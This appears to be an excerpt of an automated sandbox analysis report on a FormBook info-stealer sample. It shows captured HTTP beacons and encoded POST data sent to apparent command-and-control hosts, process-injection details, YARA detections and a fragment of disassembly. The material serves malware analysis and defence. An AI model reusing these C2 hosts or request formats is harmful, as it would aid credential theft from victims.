                                                                                                      Data Raw: 67 50 3d 33 52 4b 49 4e 38 72 75 4b 58 69 59 51 2b 54 38 61 57 37 58 31 38 41 4d 62 7a 51 77 6d 6a 73 4c 58 77 43 48 4b 67 62 4e 42 49 66 61 54 33 79 64 70 43 79 63 30 65 72 7a 53 32 43 57 52 34 54 66 59 4e 70 35 6c 4f 38 70 45 6e 70 53 44 56 4a 6f 56 4d 68 51 38 4b 73 31 4f 56 33 2b 75 35 64 38 35 65 31 6b 59 41 54 4f 76 33 76 63 34 61 32 4b 4d 39 52 39 61 65 4b 61 72 36 32 35 2f 46 4e 59 4d 46 61 73 58 6d 66 36 78 2b 37 64 47 55 76 64 76 39 6a 72 70 6f 6c 6f 64 4b 33 59 72 4f 32 52 6e 66 6a 31 54 71 4f 56 7a 68 57 6d 33 58 46 4f 57 42 33 33 32 36 34 59 53 78 35 44 78 65 73 46 6c 59 30 46 6c 4e 71 68 72 42 6c 73 66 50 37 51 42 44 4e 6e 61 77 6e 6a 57 77 4b 4c 71 7a 61 79 45 70 35 52 63 6c 42 41 47 74 4a 41 44 2b 75 4f 72 77 50 72 68 6e 51 53 63 51 53 74 75 75 37 32 4b 78 59 55 67 67 4f 4a 35 6b 64 32 58 77 31 6d 38 49 69 70 37 43 77 72 67 4d 37 7a 4a 49 68 7a 69 63 61 36 53 35 55 6d 67 52 41 66 4c 61 70 6a 72 6a 4d 45 62 53 5a 64 7a 50 72 45 54 48 4e 39 42 4b 61 53 69 32 56 50 42 4f 4e 54 4a 69 78 [TRUNCATED]
                                                                                                      Data Ascii: gP=3RKIN8ruKXiYQ+T8aW7X18AMbzQwmjsLXwCHKgbNBIfaT3ydpCyc0erzS2CWR4TfYNp5lO8pEnpSDVJoVMhQ8Ks1OV3+u5d85e1kYATOv3vc4a2KM9R9aeKar625/FNYMFasXmf6x+7dGUvdv9jrpolodK3YrO2Rnfj1TqOVzhWm3XFOWB33264YSx5DxesFlY0FlNqhrBlsfP7QBDNnawnjWwKLqzayEp5RclBAGtJAD+uOrwPrhnQScQStuu72KxYUggOJ5kd2Xw1m8Iip7CwrgM7zJIhzica6S5UmgRAfLapjrjMEbSZdzPrETHN9BKaSi2VPBONTJixc8cnVnCsZoLbN3SeQ81AfSYlK9MUFDzfaGAjfI7tsYfWz1HJP+9SlZ2errIxkjHOWAwJ83IpgPAY1To0ZszWRrIW940FukBtbsj9Q9ykQGoG0fsrI3W+yiEC6PgOFWB9NYt8iZ2MnrXQmdP326ahJSF8NnMyUMLV9JyXY+RtADGBbhSi0hCX+qZYo2p8xflBp05sAniBgU8WdxdCIjJRV4Vcx9htsaS8XUOOqofahsUi7RV/EpKcQFyb2smchjiWEzUyLtqPpYstsBKoFJX8x1r26hU4Q3OH5PwH0cEkvvdFIQ/NtnwxAjnmsKwYRgVLkODk6v8LU9iU5S48xVRE4XI1M9yxr4wI4lRtdXhvE6380yXNTGGUhZwAuD1TUF9MuROP3mzY2xEmSG7gq+iNfgdiJbr0BaFs+WjQPG4nOOaGURX/L8OW7SSKXrVtf1od2cMzyRfhVT6UG8G7tWXnX50t+w4gJNbTi7vzUdschWfNg4c66QJJ3jB9bb1Ef+8SkOWJVAaqb5cBabovft7L5sjei3D0uyf8PYTf6Ebs87WBELa/kJcoV0+7xXs2ej7ggZftnq8c9UhPBun5WJ9NpA+vQWyCovtD4oHUnME2WabbyaE3i/pnsaRZqj4tMXMy5uyryX2ha7Auis2wdbEUWpvgZhlWjzmLWf [TRUNCATED]
                                                                                                      Oct 8, 2024 15:57:28.948509932 CEST1033INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:28 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      40192.168.2.1150021198.252.106.191803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:30.863439083 CEST463OUTGET /4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6P HTTP/1.1
                                                                                                      Host: www.suarahati20.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:57:31.436985970 CEST1033INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 796
                                                                                                      date: Tue, 08 Oct 2024 13:57:31 GMT
                                                                                                      server: LiteSpeed
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      41192.168.2.115002243.154.104.247803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:37.161554098 CEST715OUTPOST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 199
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 31 67 4d 68 34 63 45 76 2b 6b 43 30 4e 69 70 51 48 4b 76 5a 4f 4e 42 6d 43 54 42 57 45 6f 68 6c 35 4f 42 71 58 6d 52 2b 65 50 34 59 42 2f 78 35 35 51 45 71 5a 74 37 4f 54 44 49 41 6f 42 4e 4e 33 78 7a 33 45 73 39 6f 42 72 7a 6e 64 67 4a 65 78 58 7a 46 5a 59 58 78 41 74 37 65 55 4c 36 6d 66 4a 5a 41 35 76 63 53 55 52 4c 53 73 5a 47 41 35 4a 75 70 4d 6b 30 7a 4e 33 75 70 4f 72 71 39 53 4a 58 73 53 43 74 34 68 75 37 33 2f 58 36 45 47 70 47 50 30 33 2f 5a 6e 41 6f 6a 75 61 36 70 48 6a 5a 71 6f 37 6f 62 74 37 6c 55 69 6f 51 37 4a 64 50 75 67 3d 3d
                                                                                                      Data Ascii: gP=HRrrDXRntJoN31gMh4cEv+kC0NipQHKvZONBmCTBWEohl5OBqXmR+eP4YB/x55QEqZt7OTDIAoBNN3xz3Es9oBrzndgJexXzFZYXxAt7eUL6mfJZA5vcSURLSsZGA5JupMk0zN3upOrq9SJXsSCt4hu73/X6EGpGP03/ZnAojua6pHjZqo7obt7lUioQ7JdPug==


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      42192.168.2.115002343.154.104.247803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:39.714010954 CEST735OUTPOST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 219
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 63 68 6d 62 6d 42 72 57 6d 52 2f 65 50 34 54 68 2f 30 33 5a 51 66 71 5a 70 7a 4f 54 50 49 41 6f 56 4e 4e 31 70 7a 32 33 30 36 72 78 72 31 76 39 67 50 42 68 58 7a 46 5a 59 58 78 42 49 67 65 56 6a 36 6d 4c 31 5a 53 59 76 66 66 30 52 4d 52 73 5a 47 52 4a 4a 71 70 4d 6b 47 7a 4d 72 58 70 4d 6a 71 39 58 74 58 73 44 43 71 78 68 75 69 71 76 57 61 4e 55 67 57 4b 32 4f 54 59 33 59 62 71 4d 32 4d 68 68 79 44 36 4c 79 2f 59 2b 7a 6e 41 45 4a 67 79 34 34 47 31 6e 33 75 77 38 7a 63 38 58 44 62 67 63 7a 39 42 34 54 78 39 36 59 3d
                                                                                                      Data Ascii: gP=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWchmbmBrWmR/eP4Th/03ZQfqZpzOTPIAoVNN1pz2306rxr1v9gPBhXzFZYXxBIgeVj6mL1ZSYvff0RMRsZGRJJqpMkGzMrXpMjq9XtXsDCqxhuiqvWaNUgWK2OTY3YbqM2MhhyD6Ly/Y+znAEJgy44G1n3uw8zc8XDbgcz9B4Tx96Y=


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      43192.168.2.115002443.154.104.247803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:42.435674906 CEST1748OUTPOST /8qne/ HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Content-Length: 1231
                                                                                                      Origin: http://www.nmh6.site
                                                                                                      Referer: http://www.nmh6.site/8qne/
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Data Raw: 67 50 3d 48 52 72 72 44 58 52 6e 74 4a 6f 4e 33 56 51 4d 6b 5a 63 45 71 65 6b 4e 78 4e 69 70 43 48 4b 72 5a 4f 42 42 6d 44 6e 72 57 57 6b 68 6d 71 47 42 72 78 61 52 34 65 50 34 51 68 2f 31 33 5a 51 65 71 5a 52 33 4f 54 7a 79 41 72 74 4e 4d 57 68 7a 78 47 30 36 77 68 72 31 6a 64 67 4b 65 78 58 71 46 5a 49 54 78 42 59 67 65 56 6a 36 6d 4e 52 5a 45 35 76 66 4d 45 52 4c 53 73 5a 53 41 35 49 39 70 4d 39 7a 7a 4d 66 48 70 64 44 71 2b 33 64 58 6a 52 71 71 74 78 75 33 70 76 57 34 4e 55 39 4d 4b 32 43 70 59 32 63 39 71 4e 43 4d 6b 6d 7a 6b 74 70 4f 70 62 63 76 70 57 47 39 45 78 61 34 42 37 58 43 58 34 35 7a 4d 68 42 4c 56 71 70 47 51 45 5a 66 35 75 73 58 6b 6b 7a 59 43 56 77 7a 7a 4b 30 4b 55 2f 47 2b 46 63 67 64 48 4e 31 45 58 35 78 30 4b 55 4e 5a 39 59 67 4e 47 4a 4f 78 4e 62 4e 30 38 43 66 43 32 30 74 2f 34 48 2b 46 33 43 67 73 38 51 54 50 55 4b 37 42 64 67 68 39 53 76 62 36 37 65 53 48 67 74 38 53 4a 62 6c 46 75 35 45 71 4a 48 30 76 65 33 66 33 4a 38 70 6d 62 55 72 75 6f 68 47 71 34 67 6d 77 55 53 37 48 [TRUNCATED]
                                                                                                      Data Ascii: gP=HRrrDXRntJoN3VQMkZcEqekNxNipCHKrZOBBmDnrWWkhmqGBrxaR4eP4Qh/13ZQeqZR3OTzyArtNMWhzxG06whr1jdgKexXqFZITxBYgeVj6mNRZE5vfMERLSsZSA5I9pM9zzMfHpdDq+3dXjRqqtxu3pvW4NU9MK2CpY2c9qNCMkmzktpOpbcvpWG9Exa4B7XCX45zMhBLVqpGQEZf5usXkkzYCVwzzK0KU/G+FcgdHN1EX5x0KUNZ9YgNGJOxNbN08CfC20t/4H+F3Cgs8QTPUK7Bdgh9Svb67eSHgt8SJblFu5EqJH0ve3f3J8pmbUruohGq4gmwUS7H9SmmIYJfrzA39GKCiwe242Kr0ld4zBu4e/hIoiGsIFw5zNQH9DmrSdMX66LR7JKY7aplOvolBtZBDWJndMnUg9hx5DdSmeE9JZdppkK2aXNdHTBKTUWVpBBEX3jwyXaYHYjgmhZBweP5/jFMdpJRh+LXIhFO9b1GzB98VOmKIiG3ZOZttpddI93V1ee6gO3K8OnbfD4nX3islgACid3ohynhr7xbQbIFsnDvQrlXObAvdYJxQmU3tN6D5W+bDzmQs6rvfVEfRJsORlWQwugBeXKzdrsC9/cARodYA0stB6jWxpVuUOvFbCO9JNpCt2WMD+WxYgWdQ9boswoQXi+uyBl7QXqxmXgiYBB1VhWfd89Bha/AlPFB42oIWBJrwG7v3a1nNXkDxwbIS4HEr8BYw2SH5seFKXNLbZdJMLN4LnpMd55redECgo/n46x1H+nFmjYR9yGuBhTuXwQErHhMT3qQEKN/zo37KbwoqDeQ22CloV9UvKVSIIh/B7lHTJG+UwKqg+ls/18P40TJA+1VWCGaebRq5EqaXzsam5PrgRmDBq302KDoC5BVeLHaBxz6cmsJKGo6d2j7XRDgl2XG/KFXfVHeUrwIzSQ5GmWbOxwUb60RMFil5CGA1HD7Te9wtYfQ31fmDFYhASIlFUVKGINJ6X9BEmPTgy [TRUNCATED]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      44192.168.2.115002543.154.104.247803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:57:44.974014997 CEST457OUTGET /8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8= HTTP/1.1
                                                                                                      Host: www.nmh6.site
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:09:53:55
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Users\user\Desktop\Z6s208B9QX.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Z6s208B9QX.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:1'403'415 bytes
                                                                                                      MD5 hash:09BFD7F979770CDE56456734D6D1FF8D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:09:53:56
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\Z6s208B9QX.exe"
                                                                                                      Imagebase:0xb30000
                                                                                                      File size:46'504 bytes
                                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:10
                                                                                                      Start time:09:54:33
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe"
                                                                                                      Imagebase:0xb30000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:09:54:35
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\SysWOW64\write.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\write.exe"
                                                                                                      Imagebase:0x750000
                                                                                                      File size:10'240 bytes
                                                                                                      MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:moderate
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:13
                                                                                                      Start time:09:54:48
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe"
                                                                                                      Imagebase:0xb30000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:09:55:00
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff6de060000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.4%
                                                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                                                        Signature Coverage:9.6%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:36
                                                                                                        execution_graph 86146 4010e0 86149 401100 86146->86149 86148 4010f8 86150 401113 86149->86150 86151 401184 86150->86151 86152 40114c 86150->86152 86154 401120 86150->86154 86181 401182 86150->86181 86187 401250 61 API calls setSBUpLow 86151->86187 86155 401151 86152->86155 86156 40119d 86152->86156 86153 40112c DefWindowProcW 86153->86148 86154->86153 86194 401000 Shell_NotifyIconW setSBUpLow 86154->86194 86158 401219 86155->86158 86159 40115d 86155->86159 86161 4011a3 86156->86161 86162 42afb4 86156->86162 86158->86154 86165 401225 86158->86165 86163 401163 86159->86163 86164 42b01d 86159->86164 86160 401193 86160->86148 86161->86154 86171 4011b6 KillTimer 86161->86171 86172 4011db SetTimer RegisterWindowMessageW 86161->86172 86189 40f190 10 API calls 86162->86189 86168 42afe9 86163->86168 86169 40116c 86163->86169 86164->86153 86193 4370f4 52 API calls 86164->86193 86205 468b0e 74 API calls setSBUpLow 86165->86205 86191 40f190 10 API calls 86168->86191 86169->86154 86176 401174 86169->86176 86170 42b04f 86195 40e0c0 86170->86195 86188 401000 Shell_NotifyIconW setSBUpLow 86171->86188 86172->86160 86174 401204 CreatePopupMenu 86172->86174 86174->86148 86190 45fd57 65 API calls setSBUpLow 86176->86190 86180 4011c9 PostQuitMessage 86180->86148 86181->86153 86182 42afe4 86182->86160 86183 42b00e 86192 401a50 329 API calls 86183->86192 86186 42afdc 86186->86153 86186->86182 86187->86160 86188->86180 86189->86160 86190->86186 86191->86183 86192->86181 86193->86181 86194->86170 86196 40e0e7 setSBUpLow 86195->86196 86197 40e142 86196->86197 86199 42729f DestroyIcon 86196->86199 86198 40e184 86197->86198 86228 4341e6 63 API calls __wcsicoll 86197->86228 86201 40e1a0 